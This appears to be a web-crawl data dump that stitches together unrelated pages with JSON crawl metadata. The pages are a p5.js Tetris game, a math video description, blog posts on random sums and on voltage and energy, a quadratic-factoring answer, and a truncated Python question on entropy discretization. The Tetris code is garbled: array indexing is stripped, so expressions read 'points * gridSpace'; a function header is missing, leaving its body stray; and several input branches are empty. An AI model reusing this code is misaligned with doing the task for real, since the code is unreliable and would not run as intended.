150;\nvar gameEdgeRight = 450;\n\nvar colors = [\n'#ecb5ff',\n'#ffa0ab',\n'#8cffb4',\n'#ff8666',\n'#80c3f5',\n'#c2e77d',\n'#fdf9a1',\n];\n\nfunction setup() {\ncreateCanvas(600, 540);\n\nfallingPiece = new playPiece();\nfallingPiece.resetPiece();\ntextFont('Trebuchet MS');\n}\n\nfunction draw() {\nvar colorDark = \"#071820\",\ncolorLight = \"#344c57\",\ncolorBackground = \"#ecf4cb\";\n\nbackground(colorBackground);\n\n//Right side info\nfill(25);\nnoStroke();\nrect(gameEdgeRight, 0, 150, height);\n//Left side info\nrect(0, 0, gameEdgeLeft, height);\n\nfill(colorBackground);\n//Score rectangle\nrect(450, 50, 150, 70);\n//Next piece rectangle\nrect(460, 300, 130, 130, 5, 5);\n//Level rectangle\nrect(460, 130, 130, 60, 5, 5);\n//Lines rectangle\nrect(460, 200, 130, 60, 5, 5);\n\nfill(colorLight);\n//Score lines\nrect(450, 55, 150, 20);\nrect(450, 80, 150, 4);\nrect(450, 110, 150, 4);\n\nfill(colorBackground);\n//Score banner\nrect(460, 30, 130, 35, 5, 5);\n\nstrokeWeight(3);\nnoFill();\nstroke(colorLight);\n//Score banner inner rectangle\nrect(465, 35, 120, 25, 5, 5);\n\n//Next piece inner rectangle\nstroke(colorLight);\nrect(465, 305, 120, 120, 5, 5);\n//Level inner rectangle\nrect(465, 135, 120, 50, 5, 5);\n//Lines inner rectangle\nrect(465, 205, 120, 50, 5, 5);\n\n//Draw the info labels\nfill(25);\nnoStroke();\ntextSize(24);\ntextAlign(CENTER);\ntext(\"Score\", 525, 55);\ntext(\"Level\", 525, 158);\ntext(\"Lines\", 525, 228);\n\n//Draw the actual info\ntextSize(24);\ntextAlign(RIGHT);\n\n//The score\ntext(currentScore, 560, 105);\ntext(currentLevel, 560, 180);\ntext(linesCleared, 560, 250);\n\nstroke(colorDark);\nline(gameEdgeRight, 0, gameEdgeRight, height);\n\nfallingPiece.show();\n\nif(keyIsDown(DOWN_ARROW)) {\nupdateEvery = 2;\n} else {\nupdateEvery = updateEveryCurrent;\n}\n\nif(!pauseGame) {\nticks++;\nif(ticks >= updateEvery) {\nticks = 0;\nfallingPiece.fall(fallSpeed);\n}\n}\n\nfor(let i = 0; i < gridPieces.length; i++) {\ngridPieces[i].show();\n}\n\nfor(let i = 0; i < lineFades.length; i++) {\n}\n\nif(gridWorkers.length > 0) {\ngridWorkers.work();\n}\n\n//Explain the controls\ntextAlign(CENTER);\nfill(255);\nnoStroke();\ntextSize(14);\ntext(\"Controls:\\n↑\\n← ↓ →\\n\", 75, 175);\ntext(\"Left and Right:\\nmove side to side\", 75, 250);\ntext(\"Up:\\nrotate\", 75, 300);\ntext(\"Down:\\nfall faster\", 75, 350);\n\n//Game over text\nif(gameOver) {\nfill(colorDark);\ntextSize(64);\ntextAlign(CENTER);\ntext(\"Game\\nOver!\", 300, 270);\n}\n}\n\nfunction lineBar(y, index) {\nthis.pos = new p5.Vector(gameEdgeLeft, y)\nthis.width = gameEdgeRight - gameEdgeLeft;\nthis.index = index;\n\nthis.show = function() {\nfill(255);\nnoStroke();\nrect(this.pos.x, this.pos.y, this.width, gridSpace);\n\nif(this.width + this.pos.x > this.pos.x) {\nthis.width -= 10;\nthis.pos.x += 5;\n} else {\n//shiftGridDown(this.pos.y, gridSpace);\ngridWorkers.push(new worker(this.pos.y, gridSpace));\n}\n}\n}\n\nfunction keyPressed() {\nif(!pauseGame) {\nif(keyCode === LEFT_ARROW) {\nfallingPiece.input(LEFT_ARROW);\n} else if(keyCode === RIGHT_ARROW) {\nfallingPiece.input(RIGHT_ARROW);\n}\nif(keyCode === UP_ARROW) {\nfallingPiece.input(UP_ARROW);\n}\n}\n}\n\nfunction playPiece() {\nthis.pos = new p5.Vector(0, 0);\nthis.rotation = 0;\nthis.nextPieceType = Math.floor(Math.random() * 7);\nthis.nextPieces = [];\nthis.pieceType = 0;\nthis.pieces = [];\nthis.orientation = [];\nthis.fallen = false;\n\nthis.nextPiece = function() {\nthis.nextPieceType = pseudoRandom(this.pieceType);\nthis.nextPieces = [];\n\nvar points = orientPoints(this.nextPieceType, 0);\nvar xx = 525, yy = 365;\n\nif(this.nextPieceType != 0 && this.nextPieceType != 3) {\nxx += (gridSpace * 0.5);\n}\n\nthis.nextPieces.push(new square(xx + points * gridSpace, yy + points * gridSpace, this.nextPieceType));\nthis.nextPieces.push(new square(xx + points * gridSpace, yy + points * gridSpace, this.nextPieceType));\nthis.nextPieces.push(new square(xx + points * gridSpace, yy + points * gridSpace, this.nextPieceType));\nthis.nextPieces.push(new square(xx + points * gridSpace, yy + points * gridSpace, this.nextPieceType));\n}\nthis.fall = function(amount) {\nif(!this.futureCollision(0, amount, this.rotation)) {\nthis.fallen = true;\n} else {\n//WE HIT SOMETHING D:\nif(!this.fallen) {\n//Game over aka pause forever\npauseGame = true;\ngameOver = true;\n} else {\nthis.commitShape();\n}\n}\n}\nthis.resetPiece = function() {\nthis.rotation = 0;\nthis.fallen = false;\nthis.pos.x = 330;\nthis.pos.y = -60;\n\nthis.pieceType = this.nextPieceType;\n\nthis.nextPiece();\nthis.newPoints();\n}\nthis.newPoints = function() {\nvar points = orientPoints(this.pieceType, this.rotation);\nthis.orientation = points;\nthis.pieces = [];\nthis.pieces.push(new square(this.pos.x + points * gridSpace, this.pos.y + points * gridSpace, this.pieceType));\nthis.pieces.push(new square(this.pos.x + points * gridSpace, this.pos.y + points * gridSpace, this.pieceType));\nthis.pieces.push(new square(this.pos.x + points * gridSpace, this.pos.y + points * gridSpace, this.pieceType));\nthis.pieces.push(new square(this.pos.x + points * gridSpace, this.pos.y + points * gridSpace, this.pieceType));\n}\n//Whenever the piece gets rotated, this gets the new positions of the squares\nthis.updatePoints = function() {\nif(this.pieces) {\nvar points = orientPoints(this.pieceType, this.rotation);\nthis.orientation = points;\nfor(var i = 0; i < 4; i++) {\nthis.pieces[i].pos.x = this.pos.x + points[i] * gridSpace;\nthis.pieces[i].pos.y = this.pos.y + points[i] * gridSpace;\n}\n}\n}\n//Adds to the position of the piece and it's square objects\nthis.pos.x += x;\nthis.pos.y += y;\n\nif(this.pieces) {\nfor(var i = 0; i < 4; i++) {\nthis.pieces[i].pos.x += x;\nthis.pieces[i].pos.y += y;\n}\n}\n}\n//Checks for collisions after adding the x and y to the current positions and also applying the given rotation\nthis.futureCollision = function(x, y, rotation) {\nvar xx, yy, points = 0;\nif(rotation != this.rotation) {\n//Gets a new point orientation to check against\npoints = orientPoints(this.pieceType, rotation);\n}\n\nfor(var i = 0; i < this.pieces.length; i++) {\nif(points) {\nxx = this.pos.x + points[i] * gridSpace;\nyy = this.pos.y + points[i] * gridSpace;\n} else {\nxx = this.pieces[i].pos.x + x;\nyy = this.pieces[i].pos.y + y;\n}\n//Check against walls and bottom\nif(xx < gameEdgeLeft || xx + gridSpace > gameEdgeRight || yy + gridSpace > height) {\nreturn true;\n}\n//Check against all pieces in the main gridPieces array (stationary pieces)\nfor(var j = 0; j < gridPieces.length; j++) {\nif(xx === gridPieces[j].pos.x) {\nif(yy >= gridPieces[j].pos.y && yy < gridPieces[j].pos.y + gridSpace) {\nreturn true;\n}\nif(yy + gridSpace > gridPieces[j].pos.y && yy + gridSpace <= gridPieces[j].pos.y + gridSpace) {\nreturn true;\n}\n}\n}\n}\n}\n//Handles input ;)\nthis.input = function(key) {\nswitch(key) {\ncase LEFT_ARROW:\nif(!this.futureCollision(-gridSpace, 0, this.rotation)) {\n}\nbreak;\ncase RIGHT_ARROW:\nif(!this.futureCollision(gridSpace, 0, this.rotation)) {\n}\nbreak;\ncase UP_ARROW:\nvar rotation = this.rotation + 1;\nif(rotation > 3) {\nrotation = 0;\n}\nif(!this.futureCollision(gridSpace, 0, rotation)) {\nthis.rotate();\n}\nbreak;\n}\n}\n//Rotates the piece by one\nthis.rotate = function() {\nthis.rotation += 1;\nif(this.rotation > 3) {\nthis.rotation = 0;\n}\nthis.updatePoints();\n}\n//Displays the piece's square objects\nthis.show = function() {\nfor(var i = 0; i < this.pieces.length; i++) {\nthis.pieces[i].show();\n}\nfor(var i = 0; i < this.nextPieces.length; i++) {\nthis.nextPieces[i].show();\n}\n}\n//Add the pieces to the gridPieces\nthis.commitShape = function() {\nfor(var i = 0; i < this.pieces.length; i++) {\ngridPieces.push(this.pieces[i])\n}\nthis.resetPiece();\nanalyzeGrid();\n}\n}\n\nfunction square(x, y, type) {\nthis.pos = new p5.Vector(x, y);\nthis.type = type;\n\nthis.show = function() {\nstrokeWeight(2);\nvar colorDark = \"#092e1d\",\ncolorMid = colors[this.type];\n\nfill(colorMid);\nstroke(25);\nrect(this.pos.x, this.pos.y, gridSpace - 1, gridSpace - 1);\n\nnoStroke();\nfill(255);\nrect(this.pos.x + 6, this.pos.y + 6, 18, 2);\nrect(this.pos.x + 6, this.pos.y + 6, 2, 16);\nfill(25);\nrect(this.pos.x + 6, this.pos.y + 20, 18, 2);\nrect(this.pos.x + 22, this.pos.y + 6, 2, 16);\n}\n}\n\n//Basically random with a bias against the same piece twice\nfunction pseudoRandom(previous) {\nvar roll = Math.floor(Math.random() * 8);\nif(roll === previous || roll === 7) {\nroll = Math.floor(Math.random() * 7);\n}\nreturn roll;\n}\n\n//Checks until it can no longer find any horizontal staights\nfunction analyzeGrid() {\nvar score = 0;\nwhile(checkLines()) {\nscore += 100;\nlinesCleared += 1;\nif(linesCleared % 10 === 0) {\ncurrentLevel += 1;\n//Increase speed here\nif(updateEveryCurrent > 4) {\nupdateEveryCurrent -= 1;\n}\n}\n}\nif(score > 100) {\nscore *= 2;\n}\ncurrentScore += score;\n}\n\nfunction checkLines() {\nvar count = 0;\nvar runningY = -1;\nvar runningIndex = -1;\n\ngridPieces.sort(function(a, b) {\nreturn a.pos.y - b.pos.y;\n});\n\nfor(var i = 0; i < gridPieces.length; i++) {\nif(gridPieces[i].pos.y === runningY) {\ncount++;\nif(count === 10) {\n//YEEHAW\ngridPieces.splice(runningIndex, 10);\n\nreturn true;\n}\n} else {\nrunningY = gridPieces[i].pos.y;\ncount = 1;\nrunningIndex = i;\n}\n}\nreturn false;\n}\n\nfunction worker(y, amount) {\nthis.amountActual = 0;\nthis.amountTotal = amount;\nthis.yVal = y;\n\nthis.work = function() {\nif(this.amountActual < this.amountTotal) {\nfor(var j = 0; j < gridPieces.length; j++) {\nif(gridPieces[j].pos.y < y) {\ngridPieces[j].pos.y += 5;\n}\n}\nthis.amountActual += 5;\n} else {\ngridWorkers.shift();\n}\n}\n}\n\n//Sorts out the block positions for a given type and rotation\nfunction orientPoints(pieceType, rotation) {\nvar results = [];\nswitch(pieceType) {\ncase 0:\nswitch(rotation) {\ncase 0:\nresults = [\n[-2, 0],\n[-1, 0],\n[ 0, 0],\n[ 1, 0]\n];\nbreak;\ncase 1:\nresults = [\n[0, -1],\n[0, 0],\n[0, 1],\n[0, 2]\n];\nbreak;\ncase 2:\nresults = [\n[-2, 1],\n[-1, 1],\n[ 0, 1],\n[ 1, 1]\n];\nbreak;\ncase 3:\nresults = [\n[-1, -1],\n[-1, 0],\n[-1, 1],\n[-1, 2]\n];\nbreak;\n}\nbreak;\ncase 1:\nswitch(rotation) {\ncase 0:\nresults = [\n[-2, -1],\n[-2, 0],\n[-1, 0],\n[ 0, 0]\n];\nbreak;\ncase 1:\nresults = [\n[-1, -1],\n[-1, 0],\n[-1, 1],\n[ 0, -1]\n];\nbreak;\ncase 2:\nresults = [\n[-2, 0],\n[-1, 0],\n[ 0, 0],\n[ 0, 1]\n];\nbreak;\ncase 3:\nresults = [\n[-1, -1],\n[-1, 0],\n[-1, 1],\n[-2, 1]\n];\nbreak;\n}\nbreak;\ncase 2:\nswitch(rotation) {\ncase 0:\nresults = [\n[-2, 0],\n[-1, 0],\n[ 0, 0],\n[ 0, -1]\n];\nbreak;\ncase 1:\nresults = [\n[-1, -1],\n[-1, 0],\n[-1, 1],\n[ 0, 1]\n];\nbreak;\ncase 2:\nresults = [\n[-2, 0],\n[-2, 1],\n[-1, 0],\n[ 0, 0]\n];\nbreak;\ncase 3:\nresults = [\n[-2, -1],\n[-1, -1],\n[-1, 0],\n[-1, 1]\n];\nbreak;\n}\nbreak;\ncase 3:\nresults = [\n[-1, -1],\n[ 0, -1],\n[-1, 0],\n[ 0, 0]\n];\nbreak;\ncase 4:\nswitch(rotation) {\ncase 0:\nresults = [\n[-1, -1],\n[-2, 0],\n[-1, 0],\n[ 0, -1]\n];\nbreak;\ncase 1:\nresults = [\n[-1, -1],\n[-1, 0],\n[ 0, 0],\n[ 0, 1]\n];\nbreak;\ncase 2:\nresults = [\n[-1, 0],\n[-2, 1],\n[-1, 1],\n[ 0, 0]\n];\nbreak;\ncase 3:\nresults = [\n[-2, -1],\n[-2, 0],\n[-1, 0],\n[-1, 1]\n];\nbreak;\n}\nbreak;\ncase 5:\nswitch(rotation) {\ncase 0:\nresults = [\n[-2, 0],\n[-1, 0],\n[-1, -1],\n[ 0, 0]\n];\nbreak;\ncase 1:\nresults = [\n[-1, -1],\n[-1, 0],\n[-1, 1],\n[ 0, 0]\n];\nbreak;\ncase 2:\nresults = [\n[-2, 0],\n[-1, 0],\n[ 0, 0],\n[-1, 1]\n];\nbreak;\ncase 3:\nresults = [\n[-2, 0],\n[-1, -1],\n[-1, 0],\n[-1, 1]\n];\nbreak;\n}\nbreak;\ncase 6:\nswitch(rotation) {\ncase 0:\nresults = [\n[-2, -1],\n[-1, -1],\n[-1, 0],\n[ 0, 0]\n];\nbreak;\ncase 1:\nresults = [\n[-1, 0],\n[-1, 1],\n[ 0, 0],\n[ 0, -1]\n];\nbreak;\ncase 2:\nresults = [\n[-2, 0],\n[-1, 0],\n[-1, 1],\n[ 0, 1]\n];\nbreak;\ncase 3:\nresults = [\n[-2, 0],\n[-2, 1],\n[-1, 0],\n[-1, -1]\n];\nbreak;\n}\nbreak;\n}\nreturn results;\n}\n```\n```\n!\n999px" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5445771,"math_prob":0.9935349,"size":15894,"snap":"2023-14-2023-23","text_gpt3_token_len":4910,"char_repetition_ratio":0.16985525,"word_repetition_ratio":0.21908548,"special_character_ratio":0.36907008,"punctuation_ratio":0.29045054,"nsfw_num_words":5,"has_unicode_error":false,"math_prob_llama3":0.96444964,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-29T15:28:39Z\",\"WARC-Record-ID\":\"<urn:uuid:b0d1d597-26d7-4912-93b0-f972235527f5>\",\"Content-Length\":\"135844\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:90d04cb3-ca51-46ba-bb2f-a7b204206035>\",\"WARC-Concurrent-To\":\"<urn:uuid:947eeb84-42d4-4cbc-8162-986708cac5ec>\",\"WARC-IP-Address\":\"104.16.176.44\",\"WARC-Target-URI\":\"https://codepen.io/dylangggg/pen/pQJzpz\",\"WARC-Payload-Digest\":\"sha1:2ASJJSOUJRUBSI5QLRTPWARGNIAKIVNB\",\"WARC-Block-Digest\":\"sha1:OHSD3SDRQKOXQOWFRIQHYGQ7DSULP4A6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296949009.11_warc_CC-MAIN-20230329151629-20230329181629-00723.warc.gz\"}"}
http://videos.mathtutordvd.com/detail/video/kzWHO05uqSM/17---adding-subtracting-simplifying-rational-expressions-part-1
[ "", null, "[Home]    [Shop Courses]   [Streaming Membership]\n\n# Amazing Science\n\n## 17 - Adding, Subtracting & Simplifying Rational Expressions, Part 1\n\nView more at http://www.MathTutorDVD.com. In this lesson, you will learn how to add and subtract rational expressions and simply the result. In order to do this, we follow the same rules of fraction arithmetic as we use for regular fractions. Specifically, to add fractions together we must first find a common denominator. When adding rational expressions we must also first find and calculate a common denominator. Once this is done we can add the numerators together as usual and simplify the result." ]
[ null, "https://www.mathtutordvd.com/public/images/color-logo-with-transparency-320.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.89721924,"math_prob":0.8502152,"size":564,"snap":"2020-24-2020-29","text_gpt3_token_len":114,"char_repetition_ratio":0.1,"word_repetition_ratio":0.0,"special_character_ratio":0.19858156,"punctuation_ratio":0.119266056,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97889894,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-05T03:14:09Z\",\"WARC-Record-ID\":\"<urn:uuid:6f205a73-8f76-4a1f-8e87-ead356f81887>\",\"Content-Length\":\"141492\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b1ef8bf4-7fb6-425e-b14d-560350c23201>\",\"WARC-Concurrent-To\":\"<urn:uuid:3961cb2e-876d-42dc-9387-ae4cb71e68f1>\",\"WARC-IP-Address\":\"52.71.152.113\",\"WARC-Target-URI\":\"http://videos.mathtutordvd.com/detail/video/kzWHO05uqSM/17---adding-subtracting-simplifying-rational-expressions-part-1\",\"WARC-Payload-Digest\":\"sha1:JAVH2JQWQQYCPIBJCG5NZXJXPGLGU4XF\",\"WARC-Block-Digest\":\"sha1:YSN7HCUTBIERUJRPSEDPI2PXIMU6NDYI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593655886865.30_warc_CC-MAIN-20200705023910-20200705053910-00244.warc.gz\"}"}
https://dirkmittler.homeip.net/blog/archives/tag/standard-deviation
[ "## The Cumulative Effect, Of Adding Many Random Numbers\n\nThe question must have crossed many people’s minds, of what the cumulative effect is, if they take the same calculated risk many times, i.e., if they add a series of numbers, each of which is random, and for the sake of argument, if each numbers has the same standard deviation.\n\nThe formal answer to that question is explained in This WiKiPedia Article. What the article states, is that ‘If two independently-random numbers are added, their expected values are added, as well as their variance, to give the expected value and the variance of the sum.’\n\nBut, what I already know, is that standard deviation is actually the square root of variance. Conversely, variance is already standard deviation squared. Therefore, the problem could be such, that the standard deviation of the individual numbers is known in advance, but that (n) random numbers are to be added. And then, because it is the square root of variance, the standard deviation of the sum will increase, as the square root of (n), times whatever the standard deviation of any one number in the series was.\n\nThis realization should be important to any people, who have a gambling problem, because people may have a tendency to think, that if they had ‘bad luck’ at a gambling table, ‘future good luck’ will come, to cancel out the bad luck they’ve already experienced. This is generally untrue, because as (n) increases, the square root of (n) will also just take the sum – of individual bets if the reader wishes – further and further away, from the expected value, because the square root of (n) will still increase. On average!\n\nBut, if we are to consider the case of gambling, then we must also take into account the expected value, which is just the average return of one bet. In the real-world case of gambling, this value is biased against the player, and earns the gambling establishment its profit. Well, according to what I wrote above, this will continue to increase linearly.\n\nNow, the question which may come to mind next would be, what effect such a summation of data has on averages. And the answer lies in the fact that the square root of (n), is a half-power of (n). A full power of (n) would grow linearly with (n), while the zero-power of (n), would just stay constant.\n\nAnd so the effect of summing many random numbers will first of all be, that the maximum and the minimum result theoretically possible, will be (n) times as far apart as they were for any one random number. This reflects the possibility, that ‘if (n) dice were rolled’, they could theoretically all come up as the maximum value possible, or all come up as the minimum value possible. And what this does to the graph of the distribution, is it initially makes the domain of the distribution curve linearly wider, along the x-axis, as a function of (n) – as the first power of (n).\n\n(Updated 05/16/2018 … )\n\n## The Relationship between Voltage and Energy\n\nEnergy is proportional to voltage squared. If we make the assumption that a variable voltage is being fed to a constant load-resistor, then with voltage, current would increase, and current would get multiplied by voltage again, to result in energy.\n\nSound energy is proportional to sound pressure squared. With increasing sound pressure, minute displacement / compression of air results, which causes displacement to rise, and displacement times pressure is again – energy.\n\nThe decibel scale is in energy units, not pressure units. Therefore, if a voltage increases by the square root of two, and if that voltage is fed to a constant load, then energy doubles, which is loosely expressed as a 3db relationship. A doubling of voltages would result in a quadrupling of energy units, which is loosely described as a 6db relationship.\n\nSomething similar happens to digitally sampled sound. The amplitudes of the samples correspond roughly to the Statistical concept of Standard Deviation, while the Statistical concept of Variance, corresponds to signal-energy. Variance equals Standard Deviation squared…\n\nDirk\n\nI should add that this applies to small-signal processing, but not to industrial power-transmission. In the latter case, the load resistances are intentionally made to scale with voltages, because the efficiency-gains that stem from voltage-increases, only stem from keeping current-levels under control. Thus, in the latter case, higher amounts of power are transmitted, but without involving higher levels of current. And so here, voltages tend to relate to power units more-or-less linearly.\n\n## The wording ‘Light Values’ can play tricks on people.\n\nWhat I wrote before, was that between (n) real, 2D photos, 1 light-value can be sampled.\n\nSome people might infer that I meant, always to use the brightness value. But this would actually be wrong. I am assuming that color footage is being used.\n\nAnd if I wanted to compare pixel-colors, to determine best-fit geometry, I would most want to go by a single hue-value.\n\nIf the color being mapped averages to ‘yellow’ – which facial colors do – then hue would be best-defined as ‘the difference between the Red and Green channels’.\n\nBut the way this works out negatively, is in the fact that actual photographic film which was used around 1977, differentiated most poorly between between Red and Green, as did any chroma / video signal. And Peter Cushing was being filmed in 1977, so that our reconstruction of him might appear in today’s movies.\n\nSo then an alternative might be, ‘Normalize all the pixels to have the same luminance, and then pick whichever primary channel that the source was best-able to resolve into minute details, on a physical level.’\n\nMaybe 1977 photographic projector-emulsions differentiated the Red primary channel best?\n\nFurther, given that there are 3 primary colors in most forms of graphics digitization, and that I would remove the overall luminance, it would follow that maybe 2 actual remaining color channels could be used, the variance of each computed separately, and the variances added?\n\nIn general, it is Mathematically safer to add Variances, than it would be to add Deviations, where Variance corresponds to Deviation squared, and where Variance therefore also corresponds to Energy, if Deviation corresponded to Potential. It is more generally agreed that Energy and its homologues are conserved quantities.\n\nDirk" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9618353,"math_prob":0.95513004,"size":2919,"snap":"2019-35-2019-39","text_gpt3_token_len":636,"char_repetition_ratio":0.12418525,"word_repetition_ratio":0.019646365,"special_character_ratio":0.22028092,"punctuation_ratio":0.1220339,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98881227,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-23T01:09:39Z\",\"WARC-Record-ID\":\"<urn:uuid:90d503b6-59a4-45df-8286-890fd60146af>\",\"Content-Length\":\"51643\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0e53f7fa-a070-48ba-9839-fe494778d8a4>\",\"WARC-Concurrent-To\":\"<urn:uuid:08411d89-b3da-4614-8982-c5f47c8792af>\",\"WARC-IP-Address\":\"69.157.146.14\",\"WARC-Target-URI\":\"https://dirkmittler.homeip.net/blog/archives/tag/standard-deviation\",\"WARC-Payload-Digest\":\"sha1:MXIKUSKSFC3RZI7E5N4TRP7IYZNGZQQ6\",\"WARC-Block-Digest\":\"sha1:BLX3NM4VIHRSJXQCUHZWPHJ4NAT6L7YS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514575844.94_warc_CC-MAIN-20190923002147-20190923024147-00354.warc.gz\"}"}
https://socratic.org/questions/how-do-you-factor-completely-2x-2-20-x-2-9x
[ "# How do you factor completely 2x^2+20=x^2+9x?\n\nDec 28, 2017\n\nGIven: $2 {x}^{2} + 20 = {x}^{2} + 9 x$\n\nCombine terms so that the quadratic is equal to 0:\n\n${x}^{2} - 9 x + 20 = 0$\n\nThis will factor into $\\left(x - {r}_{1}\\right) \\left(x - {r}_{2}\\right) = 0$, if we can find numbers such that ${r}_{1} {r}_{2} = 20$ and $- \\left({r}_{1} + {r}_{2}\\right) = - 9$.\n\n4 and 5 will do it $\\left(4\\right) \\left(5\\right) = 20$ and $- \\left(4 + 5\\right) = - 9$:\n\n$\\left(x - 4\\right) \\left(x - 5\\right) = 0$\n\nDec 28, 2017\n\nSet it equal to zero, then find factors of $c$ that add to $b$.\n\n#### Explanation:\n\nSet equal to zero:\n\n${x}^{2} - 9 x + 20 = 0$\n\nLooking at the discriminate: (${b}^{2} - 4 a c$)\n\n$81 - 4 \\cdot 1 \\cdot 20 = 81 - 80 = 1$\n\nSince $1$ is a perfect square, we know it factors.\n\nFactors of $20$ that add to $- 9$ are $- 5$ and $- 4$.\n\n$\\left(x - 5\\right) \\left(x - 4\\right) = {x}^{2} - 9 x + 20$" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6950424,"math_prob":1.0000099,"size":431,"snap":"2019-51-2020-05","text_gpt3_token_len":121,"char_repetition_ratio":0.11007026,"word_repetition_ratio":0.0,"special_character_ratio":0.2737819,"punctuation_ratio":0.1,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000038,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-15T16:50:16Z\",\"WARC-Record-ID\":\"<urn:uuid:126833d7-36b1-40a1-a094-3387ed745ed4>\",\"Content-Length\":\"34885\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cd29e802-1d5d-4037-9677-da22819e5633>\",\"WARC-Concurrent-To\":\"<urn:uuid:e4bfc433-c776-41cc-a391-1b1326b6f7ed>\",\"WARC-IP-Address\":\"54.221.217.175\",\"WARC-Target-URI\":\"https://socratic.org/questions/how-do-you-factor-completely-2x-2-20-x-2-9x\",\"WARC-Payload-Digest\":\"sha1:DQU2T56HW3U6RGNFVYEDFBSD5U2XUSWG\",\"WARC-Block-Digest\":\"sha1:XFXBABOXIGELXPYKGB2ABD3CD7EIOZKM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575541308604.91_warc_CC-MAIN-20191215145836-20191215173836-00277.warc.gz\"}"}
https://datascience.stackexchange.com/questions/103339/how-to-apply-entropy-discretization-to-a-dataset
[ "# How to apply entropy discretization to a dataset\n\nI have a simple dataset that I'd like to apply entropy discretization to. The program needs to discretize an attribute based on the following criteria\n\nWhen either the condition “a” or condition “b” is true for a partition, then that partition stops splitting:\n\na- The number of distinct classes within a partition is 1.\n\nb- The ratio of the minimum to maximum frequencies among the distinct values for the attribute Class in the partition is <0.5 and the number of distinct values\nwithin the attribute of Class in the partition is Floor(n/2), where n is the number of distinct values in the original dataset.\n\nAs an example,\n\n100 records these are the unique values of those\n\nv1 10\nv2 30\nv3 15\nv4 20\nv5 25\n\n--- n = 5\n\ns1\n\nv1 10 -> 10/30 = .34\nv2 30\nv3 15\n\n--- n1 = 3\n\ns2\nv4 20 -> 20/25 = 0.8\nv5 25\n\n--- n2 = 2\n\nif minf(s1)/maxf(s1) < 0.5 then condition 1 of b is met and floor(n/2) == n1 then condition 2 of b is met.\nstop split\n\n\nin this case v1 is the min in s1 and v2 is the max. So the algorithm should stop splitting.\n\nExpected: The program should return the bestpartition based on the maximum information gain.\n\nActual: An empty dataset is returned\n\nI have written an implementation\n\nfrom numpy.core.defchararray import count\nimport pandas as pd\nimport numpy as np\nimport numpy as np\nfrom math import floor, log2\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plot\n\ndef print_full(x):\npd.set_option('display.max_rows', len(x))\nprint(x)\npd.reset_option('display.max_rows')\n\ndef main():\nprint(s)\nprint(\"******************************************************\")\nprint(\"Entropy Discretization STARTED\")\ns = entropy_discretization(s)\nprint(\"Entropy Discretization COMPLETED\")\nprint(s)\nprint(\"******************************************************\")\n\ndef entropy_discretization(s):\n\nI = {}\ni = 0\nn = s.nunique()['A1']\ns_temp = s\ns1 = pd.DataFrame()\ns2 = pd.DataFrame()\nwhile(uniqueValue(s_temp)):\n\n# Step 1: pick a threshold\nthreshold = s_temp['A1'].iloc\n\n# Step 2: Partititon the data set into two parttitions\ns1 = s[s['A1'] < threshold]\nprint(\"s1 after spitting\")\nprint(s1)\nprint(\"******************\")\ns2 = s[s['A1'] >= threshold]\nprint(\"s2 after spitting\")\nprint(s2)\nprint(\"******************\")\n\nprint(\"******************\")\nprint(\"calculating maxf\")\nprint(f\" maxf {maxf(s['A1'])}\")\nprint(\"******************\")\n\nprint(\"******************\")\nprint(\"calculating minf\")\nprint(f\" maxf {minf(s['A1'])}\")\nprint(\"******************\")\n\n# print(maxf(s['A1'])/minf(s['A1']))\nif (maxf(s1['A1'])/minf(s1['A1']) < 0.5) and (s_temp.nunique()['A1'] == floor(n/2)):\nprint(f\"Condition b is met{maxf(s1['A1'])}/{minf(s1['A1'])} < {0.5} {s_temp.nunique()['A1']} == {floor(n/2)}\")\nbreak\n\n# Step 3: calculate the information gain.\ninformationGain = information_gain(s1,s2,s_temp)\nI.update({f'informationGain_{i}':informationGain,f'threshold_{i}': threshold})\ns_temp = s_temp[s_temp['A1'] != threshold]\ni += 1\n\n# Step 5: calculate the min information gain\nn = int(((len(I)/2)-1))\nprint(\"Calculating maximum threshold\")\nprint(\"*****************************\")\nmaxInformationGain = 0\nmaxThreshold = 0\nfor i in range(0, n):\nif(I[f'informationGain_{i}'] > maxInformationGain):\nmaxInformationGain = I[f'informationGain_{i}']\nmaxThreshold = I[f'threshold_{i}']\n\nprint(f'maxThreshold: {maxThreshold}, maxInformationGain: {maxInformationGain}')\n\ns = pd.merge(s1,s2)\n\n# Step 6: keep the partitions of S based on the value of threshold_i\nreturn s #maxPartition(maxInformationGain,maxThreshold,s,s1,s2)\n\ndef maxf(s):\nreturn s.max()\n\ndef minf(s):\nreturn s.min()\n\ndef 